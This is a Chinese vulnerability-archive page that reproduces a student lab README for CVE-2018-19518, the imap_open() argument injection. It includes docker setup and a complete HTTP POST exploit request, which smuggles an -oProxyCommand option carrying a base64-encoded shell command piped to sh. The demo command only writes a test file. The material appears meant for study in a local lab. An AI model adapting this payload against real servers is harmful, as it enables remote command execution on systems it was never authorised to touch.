目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2018-19518 PoC — University of Washington IMAP Toolkit 2007f 参数注入漏洞

来源
关联漏洞
标题: University of Washington IMAP Toolkit 2007f 参数注入漏洞 (CVE-2018-19518)
Description:University of Washington IMAP Toolkit 2007f是美国华盛顿大学(University Of Washington)的一款IMAP(Internet消息访问协议)工具包。 University of Washington IMAP Toolkit 2007f 基于UNIX平台中的imap_open()函数存在参数注入漏洞,该漏洞源于程序没有正确的验证server URI。远程攻击者可借助imap_rimap和tcp_aopen函数利用该漏洞执行任意的操作系统命令。以下
Description
some works on CVE-2018-19518 
介绍
CVE-2018-19518
==============

last rapport here : https://gitlab.com/ensimag-security/CVE-2018-19518/-/jobs/artifacts/master/raw/rapport.pdf?job=PDF

## Usage
### run app
```console
docker-compose up -d
```

example normal usage for the web app.
- imap : webmail.grenoble-inp.org
- user : prenom.nom@grenoble-inp.org
- password : xxx

### exploit 
using  ```echo '1234567890'>/tmp/test0001```.

```
POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222
```

### check
```docker-compose exec app bash``` and read the file ```cat /tmp/test0001```:

## waf
- https://github.com/theonemule/docker-waf

## Relevant commit
- https://git.php.net/?p=php-src.git;a=commit;h=e5bfea64c81ae34816479bb05d17cdffe45adddb

## References
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
- https://nvd.nist.gov/vuln/detail/CVE-2018-19518
- https://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →